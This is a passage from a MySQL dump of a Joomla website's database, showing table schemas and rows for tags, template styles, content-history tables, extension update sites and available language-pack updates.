  `note` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `description` longtext COLLATE utf8mb4_unicode_ci NOT NULL,
  `published` tinyint(1) NOT NULL DEFAULT '0',
  `checked_out` int(11) unsigned NOT NULL DEFAULT '0',
  `checked_out_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `access` int(10) unsigned NOT NULL DEFAULT '0',
  `params` mediumtext COLLATE utf8mb4_unicode_ci NOT NULL,
  `metadesc` varchar(1024) COLLATE utf8mb4_unicode_ci NOT NULL COMMENT 'The meta description for the page.',
  `metakey` varchar(1024) COLLATE utf8mb4_unicode_ci NOT NULL COMMENT 'The meta keywords for the page.',
  `metadata` varchar(2048) COLLATE utf8mb4_unicode_ci NOT NULL COMMENT 'JSON encoded metadata properties.',
  `created_user_id` int(10) unsigned NOT NULL DEFAULT '0',
  `created_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `created_by_alias` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `modified_user_id` int(10) unsigned NOT NULL DEFAULT '0',
  `modified_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `images` mediumtext COLLATE utf8mb4_unicode_ci NOT NULL,
  `urls` mediumtext COLLATE utf8mb4_unicode_ci NOT NULL,
  `hits` int(10) unsigned NOT NULL DEFAULT '0',
  `language` char(7) COLLATE utf8mb4_unicode_ci NOT NULL,
  `version` int(10) unsigned NOT NULL DEFAULT '1',
  `publish_up` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `publish_down` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  PRIMARY KEY (`id`),
  KEY `tag_idx` (`published`,`access`),
  KEY `idx_access` (`access`),
  KEY `idx_checkout` (`checked_out`),
  KEY `idx_left_right` (`lft`,`rgt`),
  KEY `idx_language` (`language`),
  KEY `idx_path` (`path`(100)),
  KEY `idx_alias` (`alias`(100))
) ENGINE=InnoDB AUTO_INCREMENT=3 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fw3gt_tags`
--

LOCK TABLES `fw3gt_tags` WRITE;
/*!40000 ALTER TABLE `fw3gt_tags` DISABLE KEYS */;
INSERT INTO `fw3gt_tags` VALUES (1,0,0,3,0,'','ROOT','root','','',1,0,'0000-00-00 00:00:00',1,'{}','','','',0,'2011-01-01 00:00:01','',0,'0000-00-00 00:00:00','','',0,'*',1,'0000-00-00 00:00:00','0000-00-00 00:00:00'),(2,1,1,2,1,'home','home','home','','	',-2,0,'0000-00-00 00:00:00',1,'{\"tag_layout\":\"\",\"tag_link_class\":\"label label-info\"}','','','{\"author\":\"\",\"robots\":\"\"}',430,'2020-08-30 15:49:31','',0,'2020-08-30 15:49:31','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{}',0,'*',1,'2020-08-30 15:49:31','2020-08-30 15:49:31');
/*!40000 ALTER TABLE `fw3gt_tags` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fw3gt_template_styles`
--

DROP TABLE IF EXISTS `fw3gt_template_styles`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `fw3gt_template_styles` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `template` varchar(50) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `client_id` tinyint(1) unsigned NOT NULL DEFAULT '0',
  `home` char(7) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '0',
  `title` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `params` mediumtext COLLATE utf8mb4_unicode_ci NOT NULL,
  PRIMARY KEY (`id`),
  KEY `idx_template` (`template`),
  KEY `idx_home` (`home`)
) ENGINE=InnoDB AUTO_INCREMENT=59 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fw3gt_template_styles`
--

LOCK TABLES `fw3gt_template_styles` WRITE;
/*!40000 ALTER TABLE `fw3gt_template_styles` DISABLE KEYS */;
INSERT INTO `fw3gt_template_styles` VALUES (16,'isis',1,'1','isis - Default','{\"templateColor\":\"\",\"logoFile\":\"\"}'),(28,'7777777',0,'0','7777777 - По умолчанию','{}'),(42,'rada030218_1',0,'0','rada030218_1 - По умолчанию','{\"blogLayoutType\":\"default\"}'),(53,'t3_blank',0,'0','t3_blank - По умолчанию','{}'),(54,'t3_bs3_blank',0,'0','t3_bs3_blank - По умолчанию','{\"t3_template\":\"1\",\"devmode\":\"0\",\"themermode\":\"1\",\"legacy_css\":\"0\",\"responsive\":\"1\",\"non_responsive_width\":\"970px\",\"build_rtl\":\"0\",\"t3-assets\":\"t3-assets\",\"t3-rmvlogo\":\"1\",\"minify\":\"0\",\"minify_js\":\"0\",\"minify_js_tool\":\"jsmin\",\"minify_exclude\":\"\",\"link_titles\":\"\",\"theme\":\"red\",\"logotype\":\"image\",\"sitename\":\"Malehus info\",\"slogan\":\"Malehus info\",\"logoimage\":\"images\\/stories\\/1002_9.jpg\",\"enable_logoimage_sm\":\"1\",\"logoimage_sm\":\"\",\"mainlayout\":\"home-2\",\"sublayout\":\"\",\"mm_type\":\"mainmenu\",\"navigation_trigger\":\"hover\",\"navigation_type\":\"megamenu\",\"navigation_animation\":\"\",\"navigation_animation_duration\":\"400\",\"mm_config\":\"\",\"navigation_collapse_enable\":\"1\",\"addon_offcanvas_enable\":\"1\",\"addon_offcanvas_effect\":\"off-canvas-effect-4\",\"snippet_open_head\":\"\",\"snippet_close_head\":\"\",\"snippet_open_body\":\"\",\"snippet_close_body\":\"\",\"snippet_debug\":\"0\"}'),(58,'m',0,'1','m - По умолчанию','{\"siteSlogan\":\"\",\"blogLayoutType\":\"default\"}');
/*!40000 ALTER TABLE `fw3gt_template_styles` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fw3gt_ucm_base`
--

DROP TABLE IF EXISTS `fw3gt_ucm_base`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `fw3gt_ucm_base` (
  `ucm_id` int(10) unsigned NOT NULL,
  `ucm_item_id` int(10) NOT NULL,
  `ucm_type_id` int(11) NOT NULL,
  `ucm_language_id` int(11) NOT NULL,
  PRIMARY KEY (`ucm_id`),
  KEY `idx_ucm_item_id` (`ucm_item_id`),
  KEY `idx_ucm_type_id` (`ucm_type_id`),
  KEY `idx_ucm_language_id` (`ucm_language_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fw3gt_ucm_base`
--

LOCK TABLES `fw3gt_ucm_base` WRITE;
/*!40000 ALTER TABLE `fw3gt_ucm_base` DISABLE KEYS */;
/*!40000 ALTER TABLE `fw3gt_ucm_base` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fw3gt_ucm_content`
--

DROP TABLE IF EXISTS `fw3gt_ucm_content`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `fw3gt_ucm_content` (
  `core_content_id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `core_type_alias` varchar(400) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '' COMMENT 'FK to the content types table',
  `core_title` varchar(400) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `core_alias` varchar(400) CHARACTER SET utf8mb4 COLLATE utf8mb4_bin NOT NULL DEFAULT '',
  `core_body` mediumtext COLLATE utf8mb4_unicode_ci NOT NULL,
  `core_state` tinyint(1) NOT NULL DEFAULT '0',
  `core_checked_out_time` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '0000-00-00 00:00:00',
  `core_checked_out_user_id` int(10) unsigned NOT NULL DEFAULT '0',
  `core_access` int(10) unsigned NOT NULL DEFAULT '0',
  `core_params` text COLLATE utf8mb4_unicode_ci NOT NULL,
  `core_featured` tinyint(4) unsigned NOT NULL DEFAULT '0',
  `core_metadata` varchar(2048) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '' COMMENT 'JSON encoded metadata properties.',
  `core_created_user_id` int(10) unsigned NOT NULL DEFAULT '0',
  `core_created_by_alias` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `core_created_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `core_modified_user_id` int(10) unsigned NOT NULL DEFAULT '0' COMMENT 'Most recent user that modified',
  `core_modified_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `core_language` char(7) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `core_publish_up` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `core_publish_down` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `core_content_item_id` int(10) unsigned NOT NULL DEFAULT '0' COMMENT 'ID from the individual type table',
  `asset_id` int(10) unsigned NOT NULL DEFAULT '0' COMMENT 'FK to the #__assets table.',
  `core_images` text COLLATE utf8mb4_unicode_ci NOT NULL,
  `core_urls` text COLLATE utf8mb4_unicode_ci NOT NULL,
  `core_hits` int(10) unsigned NOT NULL DEFAULT '0',
  `core_version` int(10) unsigned NOT NULL DEFAULT '1',
  `core_ordering` int(11) NOT NULL DEFAULT '0',
  `core_metakey` text COLLATE utf8mb4_unicode_ci NOT NULL,
  `core_metadesc` text COLLATE utf8mb4_unicode_ci NOT NULL,
  `core_catid` int(10) unsigned NOT NULL DEFAULT '0',
  `core_xreference` varchar(50) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '' COMMENT 'A reference to enable linkages to external data sets.',
  `core_type_id` int(10) unsigned NOT NULL DEFAULT '0',
  PRIMARY KEY (`core_content_id`),
  KEY `tag_idx` (`core_state`,`core_access`),
  KEY `idx_access` (`core_access`),
  KEY `idx_language` (`core_language`),
  KEY `idx_modified_time` (`core_modified_time`),
  KEY `idx_created_time` (`core_created_time`),
  KEY `idx_core_modified_user_id` (`core_modified_user_id`),
  KEY `idx_core_checked_out_user_id` (`core_checked_out_user_id`),
  KEY `idx_core_created_user_id` (`core_created_user_id`),
  KEY `idx_core_type_id` (`core_type_id`),
  KEY `idx_alias` (`core_alias`(100)),
  KEY `idx_title` (`core_title`(100)),
  KEY `idx_content_type` (`core_type_alias`(100))
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci COMMENT='Contains core content data in name spaced fields';
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fw3gt_ucm_content`
--

LOCK TABLES `fw3gt_ucm_content` WRITE;
/*!40000 ALTER TABLE `fw3gt_ucm_content` DISABLE KEYS */;
/*!40000 ALTER TABLE `fw3gt_ucm_content` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fw3gt_ucm_history`
--

DROP TABLE IF EXISTS `fw3gt_ucm_history`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `fw3gt_ucm_history` (
  `version_id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `ucm_item_id` int(10) unsigned NOT NULL,
  `ucm_type_id` int(10) unsigned NOT NULL,
  `version_note` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '' COMMENT 'Optional version name',
  `save_date` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `editor_user_id` int(10) unsigned NOT NULL DEFAULT '0',
  `character_count` int(10) unsigned NOT NULL DEFAULT '0' COMMENT 'Number of characters in this version.',
  `sha1_hash` varchar(50) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '' COMMENT 'SHA1 hash of the version_data column.',
  `version_data` longtext COLLATE utf8mb4_unicode_ci NOT NULL COMMENT 'json-encoded string of version data',
  `keep_forever` tinyint(4) NOT NULL DEFAULT '0' COMMENT '0=auto delete; 1=keep',
  PRIMARY KEY (`version_id`),
  KEY `idx_ucm_item_id` (`ucm_type_id`,`ucm_item_id`),
  KEY `idx_save_date` (`save_date`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fw3gt_ucm_history`
--

LOCK TABLES `fw3gt_ucm_history` WRITE;
/*!40000 ALTER TABLE `fw3gt_ucm_history` DISABLE KEYS */;
/*!40000 ALTER TABLE `fw3gt_ucm_history` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fw3gt_update_sites`
--

DROP TABLE IF EXISTS `fw3gt_update_sites`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `fw3gt_update_sites` (
  `update_site_id` int(11) NOT NULL AUTO_INCREMENT,
  `name` varchar(100) COLLATE utf8mb4_unicode_ci DEFAULT '',
  `type` varchar(20) COLLATE utf8mb4_unicode_ci DEFAULT '',
  `location` mediumtext COLLATE utf8mb4_unicode_ci NOT NULL,
  `enabled` int(11) DEFAULT '0',
  `last_check_timestamp` bigint(20) DEFAULT '0',
  `extra_query` varchar(1000) COLLATE utf8mb4_unicode_ci DEFAULT '',
  PRIMARY KEY (`update_site_id`)
) ENGINE=InnoDB AUTO_INCREMENT=140 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci COMMENT='Update Sites';
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fw3gt_update_sites`
--

LOCK TABLES `fw3gt_update_sites` WRITE;
/*!40000 ALTER TABLE `fw3gt_update_sites` DISABLE KEYS */;
INSERT INTO `fw3gt_update_sites` VALUES (1,'Joomla! Core','collection','https://update.joomla.org/core/sts/list_sts.xml',1,1676585046,''),(3,'Accredited Joomla! Translations','collection','https://update.joomla.org/language/translationlist_3.xml',1,1674380348,''),(16,'Joomla! Update Component Update Site','extension','https://update.joomla.org/core/extensions/com_joomlaupdate.xml',1,1674380348,''),(17,'Weblinks Update Site','extension','https://raw.githubusercontent.com/joomla-extensions/weblinks/master/manifest.xml',1,1674380348,''),(18,'Attachments Updates','extension','http://jmcameron.net/attachments/updates/updates.xml',1,1674380349,''),(19,'Attachments Russian (ru-RU) Language Pack Updates','extension','http://jmcameron.net/attachments/updates/translations/Russian-ru-RU/updates.xml',1,1674380349,''),(20,'RocketTheme Update Directory','collection','http://updates.rockettheme.com/joomla/updates.xml',1,1674380350,''),(25,'GTranslate','extension','http://gtranslate.net/downloads/gtranslate.xml',1,1674380351,''),(28,'No External Links','extension','http://saity74.ru/noextlinks/extension.xml',1,1674380351,''),(30,'WebInstaller Update Site','extension','http://appscdn.joomla.org/webapps/jedapps/webinstaller.xml',1,1674380351,''),(31,'Regular Labs - Modules Anywhere','extension','https://download.regularlabs.com/updates.xml?e=modulesanywhere&type=.xml',1,1674380352,''),(38,'Saity74 LLC - GitLab','extension','https://gitlab.s74.org/joomla/update/raw/master/plg_noextlinks/update.xml',1,1674380372,''),(48,'Saity74 LLC - GitLab','extension','https://gitlab.s74.org/joomla/extensions/raw/master/plg_noextlinks/update.xml',1,1674380392,''),(51,'WebInstaller Update Site','extension','https://appscdn.joomla.org/webapps/jedapps/webinstaller.xml',1,1674380392,''),(57,'Accredited Joomla! Translations','collection','http://update.joomla.org/language/translationlist_3.xml',1,1674380393,''),(58,'Joomline','extension','http://joomline.net/index.php?option=com_ars&view=update&task=stream&format=xml&id=11&dummy=extension.xml',1,1674380394,''),(67,'Akeeba Backup Core','extension','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml',1,1676566269,''),(76,'Akeeba FEF','extension','http://cdn.akeebabackup.com/updates/fef.xml',1,1674380394,''),(91,'AllVideos','extension','http://www.joomlaworks.net/updates/jw_allvideos.xml',1,1674380394,''),(92,'AllVideos','extension','http://cdn.joomlaworks.org/updates/allvideos.xml',1,1674380395,''),(93,'Regular Labs - Sourcerer','extension','https://download.regularlabs.com/updates.xml?e=sourcerer&type=.xml',1,1674380395,''),(95,'Image Show GK4 Updates','extension','https://www.gavick.com/update_server/joomla30/image_show_gk4.xml',1,1674380395,''),(98,'SmartCountdown Update Site','extension','http://smartcalc.es/updates/smartcountdown-update.xml',1,1674380395,''),(101,'FOF 3.x','extension','http://cdn.akeebabackup.com/updates/fof3_file.xml',1,1674380395,''),(118,'AllVideos','extension','https://cdn.joomlaworks.org/updates/allvideos.xml',1,1674380395,''),(122,'Google Structured Data','extension','https://static.tassos.gr/update/gsdfree?type=.xml',1,1674380396,''),(123,'System - Novarain Installer','extension','https://static.tassos.gr/update?type=.xml',1,1674380396,''),(129,'JCE Editor Package','extension','https://cdn.joomlacontenteditor.net/updates/xml/editor/pkg_jce.xml',1,1674380396,''),(130,'','extension','http://update.joomlart.com/service/tracking/j16/plg_system_t3.xml',1,1674380396,''),(131,'','extension','http://update.joomlart.com/service/tracking/j16/tpl_t3_blank.xml',1,1674380397,''),(132,'','extension','http://update.joomlart.com/service/tracking/j30/tpl_t3_bs3_blank.xml',1,1674380397,''),(133,'Fast Social Share Update Server','extension','http://storejextensions.org/updates/fastsocialshare_updater.xml',1,1674380397,''),(135,'COM_PHOCAGALLERY','extension','https://raw.githubusercontent.com/PhocaCz/PhocaGallery/master/manifest.xml',1,1674380398,''),(136,'MOD_PHOCAGALLERY_IMAGE','extension','https://raw.githubusercontent.com/PhocaCz/PhocaGalleryImageModule/master/manifest.xml',1,1674380398,''),(137,'Regular Labs - Modules Anywhere','extension','https://download.regularlabs.com/updates.xml?e=XXX&type=.xml',1,1674380398,''),(138,'Akeeba FEF','extension','http://cdn.akeeba.com/updates/fef.xml',1,1674380398,''),(139,'FOF 3.x','extension','http://cdn.akeeba.com/updates/fof3_file.xml',1,1674380398,'');
/*!40000 ALTER TABLE `fw3gt_update_sites` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fw3gt_update_sites_extensions`
--

DROP TABLE IF EXISTS `fw3gt_update_sites_extensions`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `fw3gt_update_sites_extensions` (
  `update_site_id` int(11) NOT NULL DEFAULT '0',
  `extension_id` int(11) NOT NULL DEFAULT '0',
  PRIMARY KEY (`update_site_id`,`extension_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci COMMENT='Links extensions to update sites';
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fw3gt_update_sites_extensions`
--

LOCK TABLES `fw3gt_update_sites_extensions` WRITE;
/*!40000 ALTER TABLE `fw3gt_update_sites_extensions` DISABLE KEYS */;
INSERT INTO `fw3gt_update_sites_extensions` VALUES (1,700),(3,802),(3,10029),(16,28),(17,801),(18,10125),(19,10126),(20,10131),(25,10153),(28,10174),(30,10180),(31,10142),(38,10174),(48,10174),(51,10180),(57,10271),(58,10272),(67,10208),(76,10303),(91,10323),(92,10323),(93,10327),(95,10331),(98,10348),(101,10351),(118,10323),(122,10388),(123,10384),(123,10391),(123,10427),(123,10429),(123,10430),(123,10431),(129,10230),(130,10400),(130,10403),(131,10401),(132,10402),(133,10406),(135,10425),(136,10426),(137,10142),(138,10303),(139,10351);
/*!40000 ALTER TABLE `fw3gt_update_sites_extensions` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fw3gt_updates`
--

DROP TABLE IF EXISTS `fw3gt_updates`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `fw3gt_updates` (
  `update_id` int(11) NOT NULL AUTO_INCREMENT,
  `update_site_id` int(11) DEFAULT '0',
  `extension_id` int(11) DEFAULT '0',
  `name` varchar(100) COLLATE utf8mb4_unicode_ci DEFAULT '',
  `description` mediumtext COLLATE utf8mb4_unicode_ci NOT NULL,
  `element` varchar(100) COLLATE utf8mb4_unicode_ci DEFAULT '',
  `type` varchar(20) COLLATE utf8mb4_unicode_ci DEFAULT '',
  `folder` varchar(20) COLLATE utf8mb4_unicode_ci DEFAULT '',
  `client_id` tinyint(3) DEFAULT '0',
  `version` varchar(32) COLLATE utf8mb4_unicode_ci DEFAULT '',
  `data` mediumtext COLLATE utf8mb4_unicode_ci NOT NULL,
  `detailsurl` mediumtext COLLATE utf8mb4_unicode_ci NOT NULL,
  `infourl` mediumtext COLLATE utf8mb4_unicode_ci NOT NULL,
  `extra_query` varchar(1000) COLLATE utf8mb4_unicode_ci DEFAULT '',
  PRIMARY KEY (`update_id`)
) ENGINE=InnoDB AUTO_INCREMENT=34753 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci COMMENT='Available Updates';
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fw3gt_updates`
--

LOCK TABLES `fw3gt_updates` WRITE;
/*!40000 ALTER TABLE `fw3gt_updates` DISABLE KEYS */;
INSERT INTO `fw3gt_updates` VALUES (4,57,0,'Armenian','','pkg_hy-AM','package','',0,'3.4.4.1','','https://update.joomla.org/language/details3/hy-AM_details.xml','',''),(5,57,0,'Malay','','pkg_ms-MY','package','',0,'3.4.1.2','','https://update.joomla.org/language/details3/ms-MY_details.xml','',''),(6,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(7,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.4.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(8,57,0,'Chinese Traditional','','pkg_zh-TW','package','',0,'3.8.0.1','','https://update.joomla.org/language/details3/zh-TW_details.xml','',''),(9,57,0,'French','','pkg_fr-FR','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(10,57,0,'Galician','','pkg_gl-ES','package','',0,'3.3.1.2','','https://update.joomla.org/language/details3/gl-ES_details.xml','',''),(11,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.4.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(12,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(13,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.4.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(14,57,0,'Hebrew','','pkg_he-IL','package','',0,'3.1.1.2','','https://update.joomla.org/language/details3/he-IL_details.xml','',''),(15,57,0,'Bengali','','pkg_bn-BD','package','',0,'3.8.10.1','','https://update.joomla.org/language/details3/bn-BD_details.xml','',''),(16,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.0.3','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(17,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.0.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(18,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.4.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(19,57,0,'Belarusian','','pkg_be-BY','package','',0,'3.2.1.2','','https://update.joomla.org/language/details3/be-BY_details.xml','',''),(20,57,0,'Bulgarian','','pkg_bg-BG','package','',0,'3.6.5.2','','https://update.joomla.org/language/details3/bg-BG_details.xml','',''),(21,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.8.11.1','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(22,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.4.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(23,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.8.5.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(24,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.4.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(25,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(26,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(27,57,0,'Esperanto','','pkg_eo-XX','package','',0,'3.8.11.1','','https://update.joomla.org/language/details3/eo-XX_details.xml','',''),(28,57,0,'Estonian','','pkg_et-EE','package','',0,'3.8.10.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(29,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(30,57,0,'Khmer','','pkg_km-KH','package','',0,'3.4.5.1','','https://update.joomla.org/language/details3/km-KH_details.xml','',''),(31,57,0,'Korean','','pkg_ko-KR','package','',0,'3.8.9.1','','https://update.joomla.org/language/details3/ko-KR_details.xml','',''),(32,57,0,'Latvian','','pkg_lv-LV','package','',0,'3.7.3.1','','https://update.joomla.org/language/details3/lv-LV_details.xml','',''),(33,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.8.10.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(34,57,0,'Macedonian','','pkg_mk-MK','package','',0,'3.6.5.1','','https://update.joomla.org/language/details3/mk-MK_details.xml','',''),(35,57,0,'Norwegian Bokmal','','pkg_nb-NO','package','',0,'3.8.11.1','','https://update.joomla.org/language/details3/nb-NO_details.xml','',''),(36,57,0,'Norwegian Nynorsk','','pkg_nn-NO','package','',0,'3.4.2.1','','https://update.joomla.org/language/details3/nn-NO_details.xml','',''),(37,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.4.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(38,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.4.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(39,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.3.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(40,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(41,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(42,57,0,'English US','','pkg_en-US','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(43,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(44,57,0,'Syriac','','pkg_sy-IQ','package','',0,'3.4.5.1','','https://update.joomla.org/language/details3/sy-IQ_details.xml','',''),(45,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(46,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.4.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(47,57,0,'Turkish','','pkg_tr-TR','package','',0,'3.9.4.1','','https://update.joomla.org/language/details3/tr-TR_details.xml','',''),(48,57,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.1','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(49,57,0,'Albanian','','pkg_sq-AL','package','',0,'3.1.1.2','','https://update.joomla.org/language/details3/sq-AL_details.xml','',''),(50,57,0,'Basque','','pkg_eu-ES','package','',0,'3.7.5.1','','https://update.joomla.org/language/details3/eu-ES_details.xml','',''),(51,57,0,'Hindi','','pkg_hi-IN','package','',0,'3.3.6.2','','https://update.joomla.org/language/details3/hi-IN_details.xml','',''),(52,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(53,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.4.2','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(54,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(55,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.1.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(56,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.4.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(57,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(58,57,0,'Vietnamese','','pkg_vi-VN','package','',0,'3.2.1.2','','https://update.joomla.org/language/details3/vi-VN_details.xml','',''),(59,57,0,'Bahasa Indonesia','','pkg_id-ID','package','',0,'3.6.2.1','','https://update.joomla.org/language/details3/id-ID_details.xml','',''),(60,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.4.2','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(61,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(62,57,0,'Montenegrin','','pkg_srp-ME','package','',0,'3.3.1.2','','https://update.joomla.org/language/details3/srp-ME_details.xml','',''),(63,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(64,57,0,'French 